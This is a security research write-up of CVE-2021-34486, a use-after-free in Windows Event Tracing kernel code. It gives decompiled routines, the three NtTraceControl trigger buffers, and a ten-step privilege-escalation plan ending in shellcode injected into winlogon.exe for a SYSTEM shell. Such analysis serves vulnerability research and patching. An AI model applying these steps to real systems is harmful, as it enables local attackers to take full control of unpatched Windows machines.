CVE-2021-34486: Event Tracing for Windows (ETW) TimerCallbackContext Object Use-After-Free Vulnerability



Overview

The Event Tracing for Windows (ETW) mechanism allows the logging of kernel or application-defined events for debugging purposes. Developers are able to start and stop event tracing sessions, instrument an application to provide trace events, and consume trace events by calling the ETW set of user-mode Windows APIs. These calls eventually translate into syscall requests to the kernel (ntoskrnl.exe), which performs the requested operation.

In the ETW request to update the periodic capture state, under specific conditions, there exists a use-after-free vulnerability whereby an attacker is able to controllably allocate a 0x30-byte buffer, free it, and subsequently reuse this buffer to execute arbitrary code.



Affected Versions

The PoC was tested on:

  • Windows 10 (x64) 21H1 (OS Build 19043.1083) with KB5004945 Cumulative Updates (07 Jul 2021) installed
  • Windows 10 (x64) 21H1 (OS Build 19043.1052) with KB5003637 Cumulative Updates (Jun 2021) installed
  • Windows 10 (x64) 21H1 (OS Build 19043.1023) with KB5003214 Cumulative Updates (May 2021) installed
  • Windows 10 (x64) 21H1 (OS Build 19043.985) with KB5003173 Cumulative Updates (May 2021) installed

The following analysis was done on ntoskrnl.exe 10.0.19041.867 (i.e. Windows 10 20H2 with the Mar 2021 updates).



Technical Details

The request to update the periodic capture state is sent with the NtTraceControl() function, using function code 0x25 and the following input buffer format:


    typedef struct _ETW_UPDATE_PERIODIC_CAPTURE_STATE
    {
        ULONG 	LoggerId;
        ULONG 	DueTime;	//system time units (100-nanosecond intervals)
        ULONG 	NumOfGuids;
        GUID 	Guids[ANYSIZE_ARRAY];
    } ETW_UPDATE_PERIODIC_CAPTURE_STATE, * PETW_UPDATE_PERIODIC_CAPTURE_STATE;
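
Because Guids[] is a variable-length trailing array, the input buffer length passed along with the request depends on NumOfGuids. The following is a minimal sketch of that size computation, assuming the structure is laid out with natural alignment exactly as declared above. GUID_MODEL, UPDATE_PCS_MODEL and request_size() are portable stand-ins invented for illustration; they are not Windows definitions.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Portable stand-in for the 16-byte Windows GUID type (assumption). */
typedef struct {
    uint32_t Data1;
    uint16_t Data2;
    uint16_t Data3;
    uint8_t  Data4[8];
} GUID_MODEL;

/* Portable model of ETW_UPDATE_PERIODIC_CAPTURE_STATE as declared above. */
typedef struct {
    uint32_t   LoggerId;
    uint32_t   DueTime;
    uint32_t   NumOfGuids;
    GUID_MODEL Guids[1];   /* ANYSIZE_ARRAY: one element declared, more may follow */
} UPDATE_PCS_MODEL;

static_assert(sizeof(GUID_MODEL) == 16, "a GUID occupies 16 bytes");

/* Bytes needed for a request carrying num_guids GUIDs (hypothetical helper). */
static size_t request_size(uint32_t num_guids)
{
    return offsetof(UPDATE_PCS_MODEL, Guids)
         + (size_t)num_guids * sizeof(GUID_MODEL);
}
```

For the single-GUID requests used in this write-up, request_size(1) evaluates to 28 (0x1C) bytes: a 12-byte header followed by one 16-byte GUID.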
                                

A total of three requests to update the periodic capture state are required to trigger the use-after-free vulnerability.

In the first request:


    ETW_UPDATE_PERIODIC_CAPTURE_STATE InBuff1 = {
        2,
        0,
        1,
        {GUID({ 0xF526AD2F, 0x57F9, 0x5336, {0x96, 0x37, 0x5C, 0x2E, 0x54, 0xF8, 0x7E, 0x9C} })} };
                                

The kernel (ntoskrnl) first retrieves the PVOID LoggerContext corresponding to LoggerId 2, then ensures that all Guids[] have notification access in this LoggerContext. Next, it allocates the callback context, a 0x30-byte CONTEXTINFO TimerContextInfo object with the EtwU pool tag, and a timer object whose callback routine is PeriodicCaptureStateTimerCallback(). It saves a reference to the timer object in the LoggerContext and activates the timer.


    typedef struct _CONTEXTINFO
    {
        WORK_QUEUE_ITEM	 WorkItem;
        ULONG64			Unknown;
        USHORT			LoggerId;
        UCHAR			Padding[6];
    } CONTEXTINFO, *PCONTEXTINFO;
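
The 0x30-byte size follows directly from the field layout on x64. The sketch below checks this with a portable model, assuming WORK_QUEUE_ITEM consists of a LIST_ENTRY followed by the worker routine pointer and its parameter, and that every pointer is 8 bytes wide. The *_MODEL type names are invented for illustration.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* x64 LIST_ENTRY: two 8-byte pointers, modelled as integers (assumption). */
typedef struct {
    uint64_t Flink;
    uint64_t Blink;
} LIST_ENTRY_MODEL;

/* Assumed WORK_QUEUE_ITEM layout on x64. */
typedef struct {
    LIST_ENTRY_MODEL List;          /* 0x00 */
    uint64_t         WorkerRoutine; /* 0x10 */
    uint64_t         Parameter;     /* 0x18 */
} WORK_QUEUE_ITEM_MODEL;

/* Model of the CONTEXTINFO structure declared above. */
typedef struct {
    WORK_QUEUE_ITEM_MODEL WorkItem;   /* 0x00 */
    uint64_t              Unknown;    /* 0x20 */
    uint16_t              LoggerId;   /* 0x28 */
    uint8_t               Padding[6]; /* 0x2A */
} CONTEXTINFO_MODEL;

/* Compile-time checks: the build fails if the layout assumptions are wrong. */
static_assert(offsetof(CONTEXTINFO_MODEL, WorkItem.WorkerRoutine) == 0x10,
              "worker routine pointer at offset 0x10");
static_assert(offsetof(CONTEXTINFO_MODEL, WorkItem.Parameter) == 0x18,
              "worker parameter at offset 0x18");
static_assert(sizeof(CONTEXTINFO_MODEL) == 0x30,
              "matches the 0x30-byte pool allocation");
```

The two offsets matter later: whoever controls the bytes at 0x10 and 0x18 of this pool controls the worker routine and its single argument.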

                                

    __int64 __fastcall EtwpUpdatePeriodicCaptureState(unsigned int LoggerId, unsigned int DueTime, unsigned __int16 NumOfGuids, GUID *Guids)
    {
        ...
        //if there is no saved timer object reference, then allocate a new instance...
        if ( !LoggerContext_->ExTimerObject )
        {
            TimerContextInfo = (CONTEXTINFO *)ExAllocatePoolWithTag(NonPagedPoolNx, 0x30ui64, 'UwtE');//allocate CONTEXTINFO object
            TimerContextInfo_ = TimerContextInfo;
            if ( !TimerContextInfo )
                goto RETURN_ERROR_C0000017;
            TimerContextInfo->LoggerId = LoggerId;//InBuff1.LoggerId
            TimerContextInfo->Unknown = v22;
            TimerContextInfo->WorkItem.WorkerRoutine = SendCaptureStateNotificationsWorker;//pointer of worker function
            TimerContextInfo->WorkItem.Parameter = TimerContextInfo;//input parameter for worker function
            TimerContextInfo->WorkItem.List.Flink = 0i64;
            LoggerContext_->ExTimerObject = ExAllocateTimer((PEXT_CALLBACK)PeriodicCaptureStateTimerCallback, TimerContextInfo, 8u);//save timer ref
        }
        ExTimerObject = (PEX_TIMER)LoggerContext_->ExTimerObject;
        LoggerContext_->DueTime = 0xFFFFFFFFFF676980ui64 * DueTime;
        ExSetTimer((ULONG_PTR)ExTimerObject);//DueTime = InBuff1.DueTime * FFFFFFFFFF676980h
        LODWORD(LoggerContext_->ExTimerState) = 1;
        goto RETURN_1;
        ...
    RETURN_1:
        if ( (_InterlockedExchangeAdd64(pLock, 0xFFFFFFFFFFFFFFFFui64) & 6) == 2 )
            ExfTryToWakePushLock(pLock);
        KeAbPostRelease((ULONG_PTR)pLock);
    RETURN_2:
        EtwpReleaseLoggerContext(LoggerContext_, 0i64);
        return (unsigned int)res_EtwpCheckNotificationAccess;
    }
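
The constant 0xFFFFFFFFFF676980 in the listing above is the two's-complement encoding of -10,000,000. Ten million 100-nanosecond intervals make one second, and ExSetTimer() treats a negative due time as relative to the current time, so the request's DueTime value appears to be scaled by one second per unit. This is a reading of the decompiled arithmetic rather than documented behaviour. The sketch below reproduces the computation; DUE_TIME_MULTIPLIER and relative_due_time() are names invented for illustration.

```c
#include <assert.h>
#include <stdint.h>

/* The multiplier taken from the decompiled listing. */
#define DUE_TIME_MULTIPLIER UINT64_C(0xFFFFFFFFFF676980)

/* The same bit pattern, read as a signed value, is -10,000,000. */
static_assert(DUE_TIME_MULTIPLIER == (uint64_t)(-INT64_C(10000000)),
              "multiplier is -10,000,000 in two's complement");

/* Signed result of the kernel's multiplication, in 100-ns units.
 * A negative value denotes a relative expiration time. */
static int64_t relative_due_time(uint32_t due_time)
{
    return -INT64_C(10000000) * (int64_t)due_time;
}
```

With DueTime set to 0, as in all three requests of this write-up, the product is 0 and the timer is due immediately.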
                                

The PeriodicCaptureStateTimerCallback() routine simply enqueues the SendCaptureStateNotificationsWorker(PCONTEXTINFO TimerContextInfo) callback routine as a work item on the system work queue. The SendCaptureStateNotificationsWorker() routine then builds and sends the notification data packet to all Guids[].

In the second request:


    ETW_UPDATE_PERIODIC_CAPTURE_STATE InBuff2 = {
        2,
        0,
        1,
        {GUID({ 0x60D201F4, 0x741E, 0x4792, {0xB5, 0xB3, 0x67, 0x3F, 0xC6, 0xC2, 0x5B, 0x3B} })} };
                                

This time, however, at least one of the Guids[] does not have notification access in the retrieved LoggerContext. The kernel therefore frees the saved GUID pool and resets LoggerContext->NumOfGuids to 0.


    __int64 __fastcall EtwpUpdatePeriodicCaptureState(unsigned int LoggerId, unsigned int DueTime, unsigned __int16 NumOfGuids, GUID *Guids)
    {
        ...
        {
        ...
    FREE_POOLS_AND_RESET:
        GuidsPool = (void *)LoggerContext_->GuidsPool;
        if ( GuidsPool )
        {
            ExFreePoolWithTag(GuidsPool, 0);
            LoggerContext->GuidsPool = 0i64;
            LOWORD(LoggerContext->NumOfGuids) = 0;
        }
        ...
        }
        if ( (_DWORD)NumOfGuids_ )
        {
            while ( 1 )//loop to ensure all Guids[] have notification-access rights
            {
                res_EtwpCheckNotificationAccess = EtwpCheckNotificationAccess(
                                                    &Guids[v4].Data1,
                                                    (__int64)&LoggerContext_->field_0[0x124]);
                if ( res_EtwpCheckNotificationAccess < 0 )
                    break;
                if ( ++v4 >= (int)NumOfGuids_ )
                    goto ALL_GUIDS_HAVE_NOTIFICATION_ACCESS_OK;
            }
            res_EtwpCheckNotificationAccess = 0xC0000022;
            v8 = 0;
            goto FREE_POOLS_AND_RESET;
        }
    ALL_GUIDS_HAVE_NOTIFICATION_ACCESS_OK:
        ...
    }
                                

By this time, the DueTime has expired and the SendCaptureStateNotificationsWorker() worker routine has been called. This routine likewise first retrieves the corresponding LoggerContext. Since LoggerContext->NumOfGuids has been reset by the second request, the routine does not perform any of its intended tasks. Instead, it immediately frees its input parameter, the PCONTEXTINFO TimerContextInfo pool. The timer object saved in the LoggerContext is not released, so it keeps the now-dangling TimerContextInfo pointer as its callback context.


    void __fastcall SendCaptureStateNotificationsWorker(CONTEXTINFO *TimerContextInfo)
    {
    ...
    if ( TimerContextInfo )
    {
        LoggerContext = (LOGGERCONTEXT *)EtwpAcquireLoggerContextByLoggerId(
                                        TimerContextInfo->Unknown,
                                        LOWORD(TimerContextInfo->LoggerId),
                                        0);
        if ( LoggerContext )
        {
        pLock = &LoggerContext->Lock;
        ExAcquirePushLockExclusiveEx((ULONG_PTR)&LoggerContext->Lock, 0i64);
        LODWORD(LoggerContext__->ExTimerState) = 0;
        if ( *(_DWORD *)&LoggerContext__->field_0[336] )
        {
            //this branch is the main functionality of SendCaptureStateNotificationsWorker() worker routine...
            NumOfGuids = LOWORD(LoggerContext__->NumOfGuids);
            if ( (_WORD)NumOfGuids )//...which will be executed when LoggerContext->NumOfGuids > 0
            {
            ...
                                if ( (int)EtwpBuildNotificationPacket(v10, v23, v15, &v19) >= 0 )
                                {
                                    EtwpSendDataBlock(v12, v19);
                                    EtwpUnreferenceDataBlock(v19);
                                }
                ...
                if ( LOWORD(LoggerContext__->NumOfGuids) && !LODWORD(LoggerContext__->ExTimerState) )
                {
                ExSetTimer(LoggerContext__->ExTimer);
                LODWORD(LoggerContext__->ExTimerState) = 1;
                v2 = 1;
                }
                ...
            ...
            }		// end of "NumOfGuids" condition
        }		// end of "LoggerContext__->field_0[336]" condition
        if ( (_InterlockedExchangeAdd64(pLock, 0xFFFFFFFFFFFFFFFFui64) & 6) == 2 )
            ExfTryToWakePushLock(pLock);
        KeAbPostRelease((ULONG_PTR)pLock);
        EtwpReleaseLoggerContext(LoggerContext__, 0i64);
        if ( v2 )//v2 is set when main functionality is executed, and hence TimerContextInfo pool is still in use...
            return;
        goto LABEL_31;//...otherwise, TimerContextInfo pool is freed
        }
    }
    LABEL_31:
    ExFreePoolWithTag(TimerContextInfo, 0);
    }
                                

In the third and last request:


    ETW_UPDATE_PERIODIC_CAPTURE_STATE InBuff3 = {
        2,
        0,
        1,
        {GUID({ 0xF526AD2F, 0x57F9, 0x5336, {0x96, 0x37, 0x5C, 0x2E, 0x54, 0xF8, 0x7E, 0x9C} })} };
                                

The kernel handles this request in the same way as the first one, except that LoggerContext_->ExTimerObject already holds a saved timer object reference, so no new CONTEXTINFO is allocated. ExSetTimer() simply starts a new timer operation on the existing timer object, whose callback context still points to the previously freed CONTEXTINFO TimerContextInfo pool. When the timer expires, the freed pool is referenced again, resulting in a BSOD. There are three common scenarios in which the freed pool is referenced again:

  1. During validation of the work item in ExQueueWorkItem(), leading to a BSOD with Bugcheck Code E4 (WORKER_INVALID)
  2. When it is freed a second time in the SendCaptureStateNotificationsWorker() worker routine, leading to a BSOD with Bugcheck Code 13A (KERNEL_MODE_HEAP_CORRUPTION)
  3. By unrelated code that has since reallocated the freed pool, leading to a BSOD with Bugcheck Code 50 (PAGE_FAULT_IN_NONPAGED_AREA)

It is worth noting that the LoggerId value sometimes has to be 3 instead of 2 to trigger the vulnerability.
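
The three-request sequence can be summarised as a small state model. The sketch below is a user-mode toy, not kernel code: it tracks only whether the context pool is live and whether the saved timer still points at it, and it never touches freed memory. All type and function names are invented for illustration, and the model assumes that a successful request records a non-zero GUID count.

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>

typedef struct {
    bool allocated;              /* models the 0x30-byte EtwU pool being live */
} ContextModel;

typedef struct {
    ContextModel *timer_context; /* context captured when the timer was created */
    bool          has_timer;     /* models LoggerContext->ExTimerObject != NULL */
    unsigned      num_guids;     /* models LoggerContext->NumOfGuids */
    bool          timer_armed;
} LoggerModel;

/* Models EtwpUpdatePeriodicCaptureState() for one request. */
static void update_request(LoggerModel *lg, ContextModel *pool, bool access_ok)
{
    if (!access_ok) {            /* access check failed: reset the GUID count */
        lg->num_guids = 0;
        return;
    }
    lg->num_guids = 1;
    if (!lg->has_timer) {        /* only the first request allocates a context */
        pool->allocated = true;
        lg->timer_context = pool;
        lg->has_timer = true;
    }
    lg->timer_armed = true;      /* ExSetTimer() on the saved timer object */
}

/* Models timer expiry plus the worker routine.
 * Returns true when the worker would run on a freed context. */
static bool timer_fires(LoggerModel *lg)
{
    if (!lg->timer_armed)
        return false;
    lg->timer_armed = false;
    if (!lg->timer_context->allocated)
        return true;             /* dangling context: the use-after-free */
    if (lg->num_guids > 0) {
        lg->timer_armed = true;  /* main path: notify, re-arm, keep the context */
        return false;
    }
    lg->timer_context->allocated = false; /* freed; the timer keeps the pointer */
    return false;
}
```

Driving the model with a successful request, a failing request and another successful request, with the timer firing after each, makes the third timer_fires() call report the dangling use.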



Exploitation Strategy

The main exploitation plan is to reclaim the freed 0x30-byte pool and overwrite it with controlled bytes. This allows us to control the callback function pointer and its corresponding parameter pointer. Most heap-spray techniques allocate pools larger than 0x30 bytes and keep them allocated, but keeping the pool allocated is not necessary here. It suffices to allocate a 0x30-byte pool and write its content; it does not matter if the buffer is subsequently freed, as long as it is not reallocated by other modules. Fortunately, there exist some Nt functions that allow us to do this.

Next, we have to find a gadget function that sets the SE_DEBUG_PRIVILEGE token bit and accepts only one pointer parameter. After some reverse-engineering, it was discovered (hat-tip to Wei Lei) that the RtlSetAllBits() function is the perfect candidate: it takes a pointer to an RTL_BITMAP BitMapHeader structure and sets the bits accordingly. However, because a system thread executes the callback function, the RTL_BITMAP BitMapHeader structure has to be allocated in the kernel; otherwise Supervisor Mode Access Prevention (SMAP) would trigger a bugcheck. To work around this, the structure (plus padding) can be set as a thread name, and its pool address can be leaked with NtQuerySystemInformation(SystemBigPoolInformation)[1].
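
To see why a bitmap routine works as a privilege gadget, the sketch below models the effect of RtlSetAllBits() in portable C. It assumes that the routine fills the bitmap buffer with 1-bits in whole 32-bit words, that a token's privilege block consists of three consecutive 64-bit masks (Present, Enabled, EnabledByDefault), and that SE_DEBUG_PRIVILEGE corresponds to bit 20. The bitmap size of 128 bits is an illustrative choice, not a value taken from the PoC, and all *_MODEL names are invented.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Model of RTL_BITMAP: a bit count and a pointer to the bit buffer. */
typedef struct {
    uint32_t  SizeOfBitMap;   /* number of bits in the bitmap */
    uint32_t *Buffer;
} RTL_BITMAP_MODEL;

/* Assumed layout of a token's privilege masks. */
typedef struct {
    uint64_t Present;
    uint64_t Enabled;
    uint64_t EnabledByDefault;
} TOKEN_PRIVILEGES_MODEL;

#define SE_DEBUG_PRIVILEGE_BIT 20u  /* assumed privilege bit index */

/* Models RtlSetAllBits(): set every bit, rounded up to whole 32-bit words. */
static void model_set_all_bits(RTL_BITMAP_MODEL *bitmap)
{
    size_t words = ((size_t)bitmap->SizeOfBitMap + 31u) / 32u;
    memset(bitmap->Buffer, 0xFF, words * sizeof(uint32_t));
}
```

Pointing Buffer at the privilege block with SizeOfBitMap set to 128 turns on every bit in Present and Enabled, including bit 20, while leaving EnabledByDefault untouched. In the real attack the bitmap header lives in a kernel pool and Buffer holds the leaked token address plus the offset of the privilege block.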

Finally, the addresses of the gadget function and the process token can be leaked with the widely used NtQuerySystemInformation(SystemModuleInformation) and NtQuerySystemInformation(SystemHandleInformation) techniques.
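
The token leak usually works by opening a handle to the current process token and then searching the handle table returned by NtQuerySystemInformation(SystemHandleInformation) for the entry with the matching process ID and handle value. The sketch below models only that search step over an already retrieved table. HANDLE_ENTRY_MODEL follows the commonly published layout of a system handle table entry on x64 and should be treated as an assumption; find_object_address() is a hypothetical helper.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Assumed per-handle entry layout on x64. */
typedef struct {
    uint16_t UniqueProcessId;
    uint16_t CreatorBackTraceIndex;
    uint8_t  ObjectTypeIndex;
    uint8_t  HandleAttributes;
    uint16_t HandleValue;
    uint64_t Object;          /* kernel address of the object behind the handle */
    uint32_t GrantedAccess;
} HANDLE_ENTRY_MODEL;

/* Returns the kernel object address for (pid, handle), or 0 if not found. */
static uint64_t find_object_address(const HANDLE_ENTRY_MODEL *entries,
                                    size_t count,
                                    uint16_t pid,
                                    uint16_t handle)
{
    for (size_t i = 0; i < count; i++) {
        if (entries[i].UniqueProcessId == pid &&
            entries[i].HandleValue == handle) {
            return entries[i].Object;
        }
    }
    return 0;
}
```

The returned address is the base of the token object; the gadget's bitmap buffer pointer is derived from it by adding the offset of the privilege masks.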

To summarize, the exploitation steps are:

  1. Leak kernel base address of ntoskrnl.exe with NtQuerySystemInformation(SystemModuleInformation)
  2. Get function offset of RtlSetAllBits() in ntoskrnl.exe
  3. Leak current process token address with NtQuerySystemInformation(SystemHandleInformation)
  4. Set a fake RTL_BITMAP FakeBitMapHeader as thread name and leak its kernel pool address with NtQuerySystemInformation(SystemBigPoolInformation)
  5. Prepare a fake CONTEXTINFO FakeContextInfo structure with the following conditions:
    • FakeContextInfo->WorkItem.List.Flink = 0 (so that current WorkItem will be validated and enqueued)
    • FakeContextInfo->WorkItem.WorkerRoutine = ntoskrnl base address + RtlSetAllBits() offset
    • FakeContextInfo->WorkItem.Parameter = RTL_BITMAP FakeBitMapHeader
  6. Send first NtTraceControl(0x25) request to trigger allocation of real CONTEXTINFO ContextInfo pool
  7. Send second NtTraceControl(0x25) request to trigger free of real CONTEXTINFO ContextInfo pool
  8. Reclaim and overwrite the freed pool with FakeContextInfo
  9. Send third NtTraceControl(0x25) request to trigger (re)use of FakeContextInfo, to enable SE_DEBUG_PRIVILEGE of current process token
  10. Inject shellcode into winlogon.exe to create a SYSTEM cmd.exe
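
Steps 1, 2 and 5 can be sketched as follows. The sketch assumes the common approach of resolving the function offset from a user-mode mapping of ntoskrnl.exe and adding it to the leaked kernel base. kernel_address(), build_fake_context() and the FAKE_CONTEXTINFO layout are hypothetical illustrations, and any addresses passed in are placeholders supplied by the caller.

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

/* Flat x64 view of the 0x30-byte CONTEXTINFO layout (assumption). */
typedef struct {
    uint64_t Flink;          /* 0x00: must be 0 so the work item is accepted */
    uint64_t Blink;          /* 0x08 */
    uint64_t WorkerRoutine;  /* 0x10: gadget address */
    uint64_t Parameter;      /* 0x18: address of the fake bitmap header */
    uint64_t Unknown;        /* 0x20 */
    uint16_t LoggerId;       /* 0x28 */
    uint8_t  Padding[6];     /* 0x2A */
} FAKE_CONTEXTINFO;

static_assert(sizeof(FAKE_CONTEXTINFO) == 0x30, "must match the freed pool size");

/* Rebase a symbol found in a user-mode mapping onto the kernel image. */
static uint64_t kernel_address(uint64_t kernel_base,
                               uint64_t user_base,
                               uint64_t user_symbol)
{
    assert(user_symbol >= user_base);
    return kernel_base + (user_symbol - user_base);
}

/* Serialise the fake structure into the bytes used to reclaim the pool. */
static void build_fake_context(uint8_t out[0x30],
                               uint64_t routine,
                               uint64_t bitmap_address)
{
    FAKE_CONTEXTINFO fake;
    memset(&fake, 0, sizeof fake);       /* Flink stays 0 */
    fake.WorkerRoutine = routine;
    fake.Parameter = bitmap_address;
    memcpy(out, &fake, sizeof fake);
}
```

The resulting 0x30 bytes are what step 8 writes into the reclaimed pool, so that the third request queues the gadget with the fake bitmap header as its only argument.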

References

  1. crazy rabbidz (@_hugsy_), SetThreadDescription() as a way to allocate controlled kernel pools